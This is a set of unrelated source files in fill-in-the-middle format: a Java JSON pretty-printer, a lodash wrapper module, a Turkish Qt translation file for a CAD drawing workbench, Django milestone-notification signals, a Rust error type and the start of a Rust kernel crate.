* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.codehaus.groovy.grails.web.json;
import static org.codehaus.groovy.grails.web.json.JSONWriter.Mode.ARRAY;
import static org.codehaus.groovy.grails.web.json.JSONWriter.Mode.KEY;
import static org.codehaus.groovy.grails.web.json.JSONWriter.Mode.OBJECT;
import java.io.IOException;
import java.io.Writer;
/**
* A JSONWriter dedicated to create indented/pretty printed output.
*
* @author Siegfried Puchbauer
* @since 1.1
*/
public class PrettyPrintJSONWriter extends JSONWriter {
public static final String DEFAULT_INDENT_STR = " ";
public static final String NEWLINE;
static {
String nl = System.getProperty("line.separator");
NEWLINE = nl != null ? nl : "\n";<|fim▁hole|> }
private int indentLevel = 0;
private final String indentStr;
public PrettyPrintJSONWriter(Writer w) {
this(w, DEFAULT_INDENT_STR);
}
public PrettyPrintJSONWriter(Writer w, String indentStr) {
super(w);
this.indentStr = indentStr;
}
private void newline() {
try {
writer.write(NEWLINE);
}
catch (IOException e) {
throw new JSONException(e);
}
}
private void indent() {
try {
for (int i = 0; i < indentLevel; i++) {
writer.write(indentStr);
}
}
catch (IOException e) {
throw new JSONException(e);
}
}
@Override
protected JSONWriter append(String s) {
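        // Values are only legal inside an object (right after a key) or an
        // array; array elements are each written on their own indented line.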
if (s == null) {
throw new JSONException("Null pointer");
}
if (mode == OBJECT || mode == ARRAY) {
try {
if (comma && mode == ARRAY) {
comma();
}
if (mode == ARRAY) {
newline();
indent();
}
writer.write(s);
}
catch (IOException e) {
throw new JSONException(e);
}
if (mode == OBJECT) {
mode = KEY;
}
comma = true;
return this;
}
throw new JSONException("Value out of sequence.");
}
@Override
protected JSONWriter end(Mode m, char c) {
newline();
indent();
return super.end(m, c);
}
@Override
public JSONWriter array() {
super.array();
indentLevel++;
return this;
}
@Override
public JSONWriter endArray() {
indentLevel--;
super.endArray();
return this;
}
@Override
public JSONWriter object() {
super.object();
indentLevel++;
return this;
}
@Override
public JSONWriter endObject() {
indentLevel--;
super.endObject();
return this;
}
@Override
public JSONWriter key(String s) {
if (s == null) {
throw new JSONException("Null key.");
}
if (mode == KEY) {
try {
if (comma) {
comma();
}
newline();
indent();
writer.write(JSONObject.quote(s));
writer.write(": ");
comma = false;
mode = OBJECT;
return this;
}
catch (IOException e) {
throw new JSONException(e);
}
}
throw new JSONException("Misplaced key.");
}
}<|fim▁end|>
| |
<|file_name|>wrapperLodash.js<|end_file_name|><|fim▁begin|>var convert = require('./convert'),
func = convert('wrapperLodash', require('../wrapperLodash'), require('./_falseOptions'));
<|fim▁hole|><|fim▁end|>
|
func.placeholder = require('./placeholder');
module.exports = func;
|
<|file_name|>Drawing_tr.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE TS>
<TS version="2.1" language="tr" sourcelanguage="en">
<context>
<name>CmdDrawingAnnotation</name>
<message>
<location filename="../../Command.cpp" line="481"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="482"/>
<source>&Annotation</source>
<translation>&Açıklayıcı notlar</translation>
</message>
<message>
<location filename="../../Command.cpp" line="483"/>
<location filename="../../Command.cpp" line="485"/>
<source>Inserts an Annotation view in the active drawing</source>
<translation>Etkin çizime açıklayıcı bir not ekler</translation>
</message>
</context>
<context>
<name>CmdDrawingClip</name>
<message>
<location filename="../../Command.cpp" line="529"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="530"/>
<source>&Clip</source>
<translation>&Kırpmak</translation>
</message>
<message>
<location filename="../../Command.cpp" line="531"/>
<location filename="../../Command.cpp" line="533"/>
<source>Inserts a clip group in the active drawing</source>
<translation>Etkin çizimine kırpma grubu ekler</translation>
</message>
</context>
<context>
<name>CmdDrawingDraftView</name>
<message>
<location filename="../../Command.cpp" line="728"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="729"/>
<source>&Draft View</source>
<translation>&Taslak Görünümü</translation>
</message>
<message>
<location filename="../../Command.cpp" line="730"/>
<location filename="../../Command.cpp" line="732"/>
<source>Inserts a Draft view of the selected object(s) in the active drawing</source>
<translation>Seçili nesnelerin taslak görünümünü etkin çizime ekler</translation>
</message>
</context>
<context>
<name>CmdDrawingExportPage</name>
<message>
<location filename="../../Command.cpp" line="635"/>
<source>File</source>
<translation>Dosya</translation>
</message>
<message>
<location filename="../../Command.cpp" line="636"/>
<source>&Export page...</source>
<translation>&Sayfayı dışa aktar...</translation>
</message>
<message>
<location filename="../../Command.cpp" line="637"/>
<location filename="../../Command.cpp" line="639"/>
<source>Export a page to an SVG file</source>
<translation>Sayfayı, SVG dosyası olarak dışarı aktar</translation>
</message>
</context>
<context>
<name>CmdDrawingNewA3Landscape</name>
<message>
<location filename="../../Command.cpp" line="275"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="276"/>
<location filename="../../Command.cpp" line="277"/>
<source>Insert new A3 landscape drawing</source>
<translation>Yeni yatay A3 boyutlu çizim ekle</translation>
</message>
</context>
<context>
<name>CmdDrawingNewPage</name>
<message>
<location filename="../../Command.cpp" line="97"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="98"/>
<location filename="../../Command.cpp" line="99"/>
<source>Insert new drawing</source>
<translation>Yeni Çizim Ekle</translation>
</message>
</context>
<context>
<name>CmdDrawingNewView</name>
<message>
<location filename="../../Command.cpp" line="314"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="315"/>
<source>Insert view in drawing</source>
<translation>Çizime görünüm ekle</translation>
</message>
<message>
<location filename="../../Command.cpp" line="316"/>
<source>Insert a new View of a Part in the active drawing</source><|fim▁hole|> </message>
</context>
<context>
<name>CmdDrawingOpen</name>
<message>
<location filename="../../Command.cpp" line="60"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="61"/>
<source>Open SVG...</source>
<translation>SVG Aç...</translation>
</message>
<message>
<location filename="../../Command.cpp" line="62"/>
<source>Open a scalable vector graphic</source>
<translation>Boyutlandırılabilir bir vektörel çizim seçin</translation>
</message>
</context>
<context>
<name>CmdDrawingOpenBrowserView</name>
<message>
<location filename="../../Command.cpp" line="443"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="444"/>
<source>Open &browser view</source>
<translation>&tarayıcı görünümü aç</translation>
</message>
<message>
<location filename="../../Command.cpp" line="445"/>
<location filename="../../Command.cpp" line="447"/>
<source>Opens the selected page in a browser view</source>
<translation>Seçili sayfayı tarayıcı görünümünde açar</translation>
</message>
</context>
<context>
<name>CmdDrawingOrthoViews</name>
<message>
<location filename="../../Command.cpp" line="393"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="394"/>
<source>Insert orthographic views</source>
<translation>Ortografik görünümleri ekle</translation>
</message>
<message>
<location filename="../../Command.cpp" line="395"/>
<source>Insert an orthographic projection of a part in the active drawing</source>
<translation>Bir parçanın ortografik izdüşümünü etkin çizime ekle</translation>
</message>
</context>
<context>
<name>CmdDrawingProjectShape</name>
<message>
<location filename="../../Command.cpp" line="692"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="693"/>
<source>Project shape...</source>
<translation>Proje şekilleri...</translation>
</message>
<message>
<location filename="../../Command.cpp" line="694"/>
<location filename="../../Command.cpp" line="695"/>
<source>Project shape onto a user-defined plane</source>
<translation>Kullanıcının tanımladığı bir düzleme şekli yansıt</translation>
</message>
</context>
<context>
<name>CmdDrawingSpreadsheetView</name>
<message>
<location filename="../../Command.cpp" line="759"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="760"/>
<source>&Spreadsheet View</source>
<translation>He&sapTablosu Görünümü</translation>
</message>
<message>
<location filename="../../Command.cpp" line="761"/>
<location filename="../../Command.cpp" line="763"/>
<source>Inserts a view of a selected spreadsheet in the active drawing</source>
<translation>Seçili hesap tablolarının bir görünümünü etkin çizime ekler</translation>
</message>
</context>
<context>
<name>CmdDrawingSymbol</name>
<message>
<location filename="../../Command.cpp" line="574"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="575"/>
<source>&Symbol</source>
<translation>&Sembol</translation>
</message>
<message>
<location filename="../../Command.cpp" line="576"/>
<location filename="../../Command.cpp" line="578"/>
<source>Inserts a symbol from a svg file in the active drawing</source>
<translation>Etkin çizimde bir svg dosyasından bir simge ekler</translation>
</message>
</context>
<context>
<name>DrawingGui::DrawingView</name>
<message>
<location filename="../../DrawingView.cpp" line="219"/>
<source>&Background</source>
<translation>&Arkaplan</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="225"/>
<source>&Outline</source>
<translation>&Taslak</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="231"/>
<source>&Native</source>
<translation>&Yerel</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="235"/>
<source>&OpenGL</source>
<translation>&OpenGL</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="238"/>
<source>&Image</source>
<translation>&Resim</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="242"/>
<source>&High Quality Antialiasing</source>
<translation>&Yüksek kaliteli keskinlik yumuşatma</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="284"/>
<source>Open SVG File</source>
<translation>SVG Dosyası Aç</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="285"/>
<source>Could not open file '%1'.</source>
<translation>'%1' adlı dosya açılamadı.</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="408"/>
<source>&Renderer</source>
<translation>İşleyici (Renderer)</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="513"/>
<source>Export PDF</source>
<translation>PDF olarak dışarı aktar</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="514"/>
<source>PDF file</source>
<translation>PDF dosyası</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="530"/>
<source>Page sizes</source>
<translation>Sayfa boyutları</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="532"/>
<location filename="../../DrawingView.cpp" line="545"/>
<source>A0</source>
<translation>A0</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="534"/>
<location filename="../../DrawingView.cpp" line="547"/>
<source>A1</source>
<translation>A1</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="536"/>
<location filename="../../DrawingView.cpp" line="549"/>
<source>A2</source>
<translation>A2</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="538"/>
<location filename="../../DrawingView.cpp" line="551"/>
<source>A3</source>
<translation>A3</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="540"/>
<location filename="../../DrawingView.cpp" line="553"/>
<source>A4</source>
<translation>A4</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="542"/>
<location filename="../../DrawingView.cpp" line="555"/>
<source>A5</source>
<translation>A5</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="666"/>
<source>Different orientation</source>
<translation>Ekran yönü</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="667"/>
<source>The printer uses a different orientation than the drawing.
Do you want to continue?</source>
<translation>Yazıcı çizimden farklı bir yönlendirme kullanıyor.
Devam etmek istiyor musun?</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="674"/>
<location filename="../../DrawingView.cpp" line="682"/>
<source>Different paper size</source>
<translation>Farklı kağıt boyutu</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="675"/>
<location filename="../../DrawingView.cpp" line="683"/>
<source>The printer uses a different paper size than the drawing.
Do you want to continue?</source>
<translation>Yazıcı, çizimden farklı bir kağıt boyutu kullanıyor.
Devam etmek istiyor musun?</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="694"/>
<source>Opening file failed</source>
<translation>Dosya açılamadı</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="695"/>
<source>Can't open file '%1' for writing.</source>
<translation>Dosya '%1' yazmak için açılamıyor.</translation>
</message>
</context>
<context>
<name>DrawingGui::TaskOrthoViews</name>
<message>
<location filename="../../TaskOrthoViews.ui" line="26"/>
<source>Orthographic Projection</source>
<translation>Dik çizgisel izdüşüm</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="46"/>
<location filename="../../TaskOrthoViews.ui" line="71"/>
<location filename="../../TaskOrthoViews.ui" line="96"/>
<location filename="../../TaskOrthoViews.ui" line="121"/>
<location filename="../../TaskOrthoViews.ui" line="146"/>
<location filename="../../TaskOrthoViews.ui" line="177"/>
<location filename="../../TaskOrthoViews.ui" line="202"/>
<location filename="../../TaskOrthoViews.ui" line="227"/>
<location filename="../../TaskOrthoViews.ui" line="252"/>
<location filename="../../TaskOrthoViews.ui" line="277"/>
<location filename="../../TaskOrthoViews.ui" line="302"/>
<location filename="../../TaskOrthoViews.ui" line="362"/>
<source>Right click for axonometric settings</source>
<translation>Aksonometrik ayarlar için sağ tıklayın</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="324"/>
<source>Primary view</source>
<translation>Birincil anahtar</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="340"/>
<source>Secondary Views</source>
<translation>İkincil Metin</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="412"/>
<source>General</source>
<translation>Genel</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="421"/>
<source>Auto scale / position</source>
<translation>Otomatik ölçek / konum</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="436"/>
<source>Scale</source>
<translation>Ölçek</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="468"/>
<source>Top left x / y</source>
<translation>«Ana sayfa» sol x / y</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="516"/>
<source>Spacing dx / dy</source>
<translation>Aralığı dx / dy</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="561"/>
<source>Show hidden lines</source>
<translation>Gizli çizgileri göster</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="568"/>
<source>Show smooth lines</source>
<translation>Düzgün çizgileri göster</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="579"/>
<source>Axonometric</source>
<translation>Aksonometrik</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="587"/>
<source>Axis out and right</source>
<translation>Eksen dışarı ve sağ</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="594"/>
<source>Vertical tilt</source>
<translation>Dikey eğim</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="605"/>
<location filename="../../TaskOrthoViews.ui" line="805"/>
<source>X +ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="610"/>
<location filename="../../TaskOrthoViews.ui" line="685"/>
<location filename="../../TaskOrthoViews.ui" line="810"/>
<source>Y +ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="615"/>
<location filename="../../TaskOrthoViews.ui" line="690"/>
<location filename="../../TaskOrthoViews.ui" line="815"/>
<source>Z +ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="620"/>
<location filename="../../TaskOrthoViews.ui" line="820"/>
<source>X -ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="625"/>
<location filename="../../TaskOrthoViews.ui" line="695"/>
<location filename="../../TaskOrthoViews.ui" line="825"/>
<source>Y -ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="630"/>
<location filename="../../TaskOrthoViews.ui" line="700"/>
<location filename="../../TaskOrthoViews.ui" line="830"/>
<source>Z -ve</source>
<translation>X + ve</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="642"/>
<source>Isometric</source>
<translation>İzometrik</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="647"/>
<source>Dimetric</source>
<translation>Dimetrik</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="652"/>
<source>Trimetric</source>
<translation>Trimetrik</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="660"/>
<source> Scale</source>
<translation> Ölçekler</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="667"/>
<source>View projection</source>
<translation>İzdüşümü görüntüle</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="674"/>
<source> Axis aligned up</source>
<translation> Eksen hizaya getirildi</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="715"/>
<location filename="../../TaskOrthoViews.ui" line="738"/>
<source>Flip</source>
<translation>Çevir</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="728"/>
<source> Trimetric</source>
<translation> Trimetrik</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="756"/>
<source>Projection</source>
<translation>İzdüşümler</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="767"/>
<source>Third Angle</source>
<translation>Üçüncü açı</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="772"/>
<source>First Angle</source>
<translation>İki açıları arasındaki fark</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="791"/>
<source>View from:</source>
<translation>Şu adresten görüntüle:</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.ui" line="838"/>
<source>Axis aligned right:</source>
<translation>Eksen hizaya getirildi:</translation>
</message>
</context>
<context>
<name>DrawingGui::TaskProjection</name>
<message>
<location filename="../../TaskDialog.cpp" line="51"/>
<source>Visible sharp edges</source>
<translation>Görünür keskin kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="52"/>
<source>Visible smooth edges</source>
<translation>Görünür pürüzsüz kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="53"/>
<source>Visible sewn edges</source>
<translation>Görünür dikilir kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="54"/>
<source>Visible outline edges</source>
<translation>Görünür anahat kenarları</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="55"/>
<source>Visible isoparameters</source>
<translation>Görünür izodeğişkenler</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="56"/>
<source>Hidden sharp edges</source>
<translation>Gizli keskin kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="57"/>
<source>Hidden smooth edges</source>
<translation>Gizli pürüzsüz kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="58"/>
<source>Hidden sewn edges</source>
<translation>Gizli dikili kenarlar</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="59"/>
<source>Hidden outline edges</source>
<translation>Gizli kenar konturları</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="60"/>
<source>Hidden isoparameters</source>
<translation>Gizli izodeğişkenler</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="77"/>
<source>Project shapes</source>
<translation>Proje şekilleri</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="91"/>
<source>No active document</source>
<translation>Etkin belge yok</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="92"/>
<source>There is currently no active document to complete the operation</source>
<translation>İşlemi tamamlamak için henüz aktif bir belge mevcut değil</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="97"/>
<source>No active view</source>
<translation>Aktif görünüm yok</translation>
</message>
<message>
<location filename="../../TaskDialog.cpp" line="98"/>
<source>There is currently no active view to complete the operation</source>
<translation>İşlemi tamamlamak için halihazırda etkin görüş mevcut değil</translation>
</message>
</context>
<context>
<name>Drawing_NewPage</name>
<message>
<location filename="../../Command.cpp" line="223"/>
<source>Landscape</source>
<translation>Manzara</translation>
</message>
<message>
<location filename="../../Command.cpp" line="225"/>
<source>Portrait</source>
<translation>Dikey</translation>
</message>
<message>
<location filename="../../Command.cpp" line="229"/>
<source>%1%2 %3</source>
<translation>%1%2 %3</translation>
</message>
<message>
<location filename="../../Command.cpp" line="234"/>
<source>Insert new %1%2 %3 drawing</source>
<translation>Yeni %1%2 %3 çizim ekle</translation>
</message>
<message>
<location filename="../../Command.cpp" line="241"/>
<source>%1%2 %3 (%4)</source>
<translation>%1%2 %3 (%4)</translation>
</message>
<message>
<location filename="../../Command.cpp" line="247"/>
<source>Insert new %1%2 %3 (%4) drawing</source>
<translation>Yeni %1%2 %3 (%4) çizim ekle</translation>
</message>
</context>
<context>
<name>QObject</name>
<message>
<location filename="../../Command.cpp" line="72"/>
<location filename="../../Command.cpp" line="595"/>
<source>Choose an SVG file to open</source>
<translation>Açmak için bir SVG dosyası seçin</translation>
</message>
<message>
<location filename="../../Command.cpp" line="73"/>
<location filename="../../Command.cpp" line="596"/>
<location filename="../../Command.cpp" line="654"/>
<source>Scalable Vector Graphic</source>
<translation>Ölçeklenebilir Vektör Grafiği</translation>
</message>
<message>
<location filename="../../Command.cpp" line="327"/>
<location filename="../../Command.cpp" line="406"/>
<location filename="../../Command.cpp" line="456"/>
<location filename="../../Command.cpp" line="648"/>
<location filename="../../Command.cpp" line="772"/>
<source>Wrong selection</source>
<translation>Yanlış seçim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="328"/>
<source>Select a Part object.</source>
<translation>Parça nesnesi seçin.</translation>
</message>
<message>
<location filename="../../Command.cpp" line="336"/>
<location filename="../../Command.cpp" line="415"/>
<location filename="../../Command.cpp" line="496"/>
<location filename="../../Command.cpp" line="544"/>
<location filename="../../Command.cpp" line="589"/>
<location filename="../../Command.cpp" line="778"/>
<source>No page found</source>
<translation>Sayfa bulunamadı</translation>
</message>
<message>
<location filename="../../Command.cpp" line="337"/>
<location filename="../../Command.cpp" line="416"/>
<location filename="../../Command.cpp" line="497"/>
<location filename="../../Command.cpp" line="545"/>
<location filename="../../Command.cpp" line="590"/>
<location filename="../../Command.cpp" line="779"/>
<source>Create a page first.</source>
<translation>Önce bir sayfa oluşturun.</translation>
</message>
<message>
<location filename="../../Command.cpp" line="407"/>
<source>Select exactly one Part object.</source>
<translation>Tek bir bölüm nesnesi seçin.</translation>
</message>
<message>
<location filename="../../Command.cpp" line="457"/>
<location filename="../../Command.cpp" line="649"/>
<source>Select one Page object.</source>
<translation>Bir sayfa nesnesi seçin.</translation>
</message>
<message>
<location filename="../../Command.cpp" line="655"/>
<source>All Files</source>
<translation>Tüm Dosyalar</translation>
</message>
<message>
<location filename="../../Command.cpp" line="657"/>
<source>Export page</source>
<translation>Sayfayı dışarı aktar</translation>
</message>
<message>
<location filename="../../Command.cpp" line="773"/>
<source>Select exactly one Spreadsheet object.</source>
<translation>Tam olarak bir Hesap Tablosu nesnesi seçin.</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.cpp" line="54"/>
<location filename="../../TaskOrthoViews.cpp" line="982"/>
<source>Make axonometric...</source>
<translation>Aksonometrik yap...</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.cpp" line="55"/>
<location filename="../../TaskOrthoViews.cpp" line="983"/>
<source>Edit axonometric settings...</source>
<translation>Aksonometrik ayarlarını düzenle...</translation>
</message>
<message>
<location filename="../../TaskOrthoViews.cpp" line="56"/>
<location filename="../../TaskOrthoViews.cpp" line="984"/>
<source>Make orthographic</source>
<translation>Ortografik yap</translation>
</message>
<message>
<location filename="../../ViewProviderPage.cpp" line="152"/>
<source>Show drawing</source>
<translation>Çizimi göster</translation>
</message>
</context>
<context>
<name>Workbench</name>
<message>
<location filename="../../Workbench.cpp" line="37"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
</context>
</TS><|fim▁end|>
|
<translation>Etkin çizimde bir parçanın yeni görünümünü ekle</translation>
|
<|file_name|>signals.py<|end_file_name|><|fim▁begin|>"""
Django signals for the app.
"""
import logging
from django.db.models.signals import post_save
from django.conf import settings
from django.contrib.sites.models import Site
from .models import Response, UnitLesson
from .ct_util import get_middle_indexes
from core.common.mongo import c_milestone_orct
from core.common.utils import send_email, suspending_receiver
log = logging.getLogger(__name__)
@suspending_receiver(post_save, sender=Response)
def run_courselet_notif_flow(sender, instance, **kwargs):
# TODO: add check that Response has a text, as an obj can be created before a student submits
# TODO: exclude self eval submissions other than a response submission (e.g. "just guessing")
if (instance.kind == Response.ORCT_RESPONSE and not
(instance.unitLesson.kind == UnitLesson.RESOLVES or
instance.is_test or instance.is_preview or not instance.unitLesson.order)):
course = instance.course
course_id = course.id if course else None
instructors = course.get_users(role="prof")
lesson = instance.lesson
lesson_id = lesson.id if lesson else None
student = instance.author
student_id = student.id if student else None
unit_lesson = instance.unitLesson
unit_lesson_id = unit_lesson.id if unit_lesson else None # it's a thread
# Exclude instructors, e.g. the ones submitting in preview mode
for instructor in instructors:
if student_id == instructor.id:
return
# Define if it's a milestone question (either first, middle, or last)
milestone = None
questions = unit_lesson.unit.all_orct()
i = [_[0] for _ in questions.values_list('id')].index(unit_lesson_id)
if i == 0:
milestone = "first"
elif i == len(questions) - 1:
milestone = "last"
elif i in get_middle_indexes(questions):
milestone = "middle" # TODO consider returning a single number
# If milestone, store the record
if milestone:
to_save = {
"milestone": milestone,
"lesson_title": lesson.title if lesson else None,
"lesson_id": lesson_id,
"unit_lesson_id": unit_lesson_id,
"course_title": course.title if course else None,
"course_id": course_id,
"student_username": student.username if student else None,<|fim▁hole|> milestone_orct_answers_cursor = c_milestone_orct(use_secondary=False).find({
"milestone": milestone,
"lesson_id": lesson_id
})
initial_milestone_orct_answers_number = milestone_orct_answers_cursor.count()
milestone_orct_answers = (a for a in milestone_orct_answers_cursor)
already_exists = False
for answer in milestone_orct_answers:
if answer.get("student_id") == student_id:
already_exists = True
break
if not already_exists:
c_milestone_orct(use_secondary=False).save(to_save)
milestone_orct_answers_number = initial_milestone_orct_answers_number + 1
# If N students responded to a milestone question, send an email.
# The threshold holds for each milestone separately.
if milestone_orct_answers_number == settings.MILESTONE_ORCT_NUMBER:
context_data = {
"milestone": milestone,
"students_number": milestone_orct_answers_number,
"course_title": course.title if course else None,
"lesson_title": lesson.title if lesson else None,
"current_site": Site.objects.get_current(),
"course_id": course_id,
"unit_lesson_id": unit_lesson_id,
"courselet_pk": unit_lesson.unit.id if unit_lesson.unit else None
} # pragma: no cover
log.info("""Courselet notification with data:
Course title - {course_title},
Lesson title - {lesson_title},
Students number - {students_number},
Unit lesson id - {unit_lesson_id},
Course id - {course_id},
Milestone - {milestone}
""".format(**context_data)) # pragma: no cover
send_email(
context_data=context_data,
from_email=settings.EMAIL_FROM,
to_email=[instructor.email for instructor in instructors],
template_subject="ct/email/milestone_ortc_notify_subject",
template_text="ct/email/milestone_ortc_notify_text"
)<|fim▁end|>
|
"student_id": student_id,
# "datetime": datetime.datetime.now() # TODO: consider changing to UTC (and making it a timestamp)
}
# Do not store if such `student_id`-`lesson_id` row is already present
|
<|file_name|>error.rs<|end_file_name|><|fim▁begin|>use std::error::Error as StdError;
use std::fmt::{self, Debug, Display, Formatter};
use std::io;
use hyper::Error as HyperError;
use rustc_serialize::json::DecoderError;
use telegram_bot;
pub enum Error {
General(String),
}
impl From<HyperError> for Error {
fn from(e: HyperError) -> Error {
Error::General(e.description().to_owned())
}
}
impl From<DecoderError> for Error {
fn from(e: DecoderError) -> Error {
Error::General(e.description().to_owned())
}
}
impl From<io::Error> for Error {
fn from(e: io::Error) -> Error {
Error::General(e.description().to_owned())
}
}
impl From<telegram_bot::Error> for Error {
fn from(e: telegram_bot::Error) -> Error {
Error::General(e.description().to_owned())
}
}
impl Debug for Error {
fn fmt(&self, f: &mut Formatter) -> Result<(), fmt::Error> {
match *self {
Error::General(ref msg) => write!(f, "error: {}", msg).unwrap(),
};
Ok(())
}
}
impl Display for Error {
fn fmt(&self, f: &mut Formatter) -> Result<(), fmt::Error> {
match *self {
Error::General(ref msg) => write!(f, "error: {}", msg).unwrap(),
};
Ok(())
}
}
impl StdError for Error {
fn description(&self) -> &str {<|fim▁hole|> Error::General(ref msg) => msg,
}
}
}<|fim▁end|>
|
match *self {
|
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>#![feature(abi_x86_interrupt)]
#![feature(asm)]
#![feature(const_fn, unique)]
#![feature(lang_items)]
#![feature(naked_functions)]
#![no_std]
#![feature(alloc, collections)]
#![feature(core_intrinsics)]
extern crate bit_field;
#[macro_use]
extern crate bitflags;
extern crate raw_cpuid;
#[macro_use]
extern crate lazy_static;
extern crate multiboot2;
extern crate rlibc;
extern crate spin;
extern crate volatile;
extern crate x86_64;
extern crate hole_list_allocator;
extern crate alloc;
extern crate collections;
#[macro_use]
extern crate once;
// Make constants public
pub use consts::*;
#[macro_use]
/// Console handling
pub mod vga_buffer;
/// Kernel message writer
pub mod kernel_messaging;
/// ACPI manager
pub mod acpi;
/// Architecture constants
pub mod consts;
/// Architecture context
pub mod context;
/// Devices management
pub mod device;
/// Memory management
pub mod memory;
/// Interrupt instructions
pub mod interrupts;
/// Initialization and start function
pub mod start;
/// Timer functions
pub mod time;
#[cfg(not(test))]
#[lang = "eh_personality"]
extern "C" fn eh_personality() {}
#[cfg(not(test))]
#[lang = "panic_fmt"]
#[no_mangle]
pub extern "C" fn panic_fmt(fmt: core::fmt::Arguments, file: &'static str, line: u32) -> ! {
println!("\n\nPANIC in {} at line {}:", file, line);
println!(" {}", fmt);
loop {}
}
#[allow(non_snake_case)]
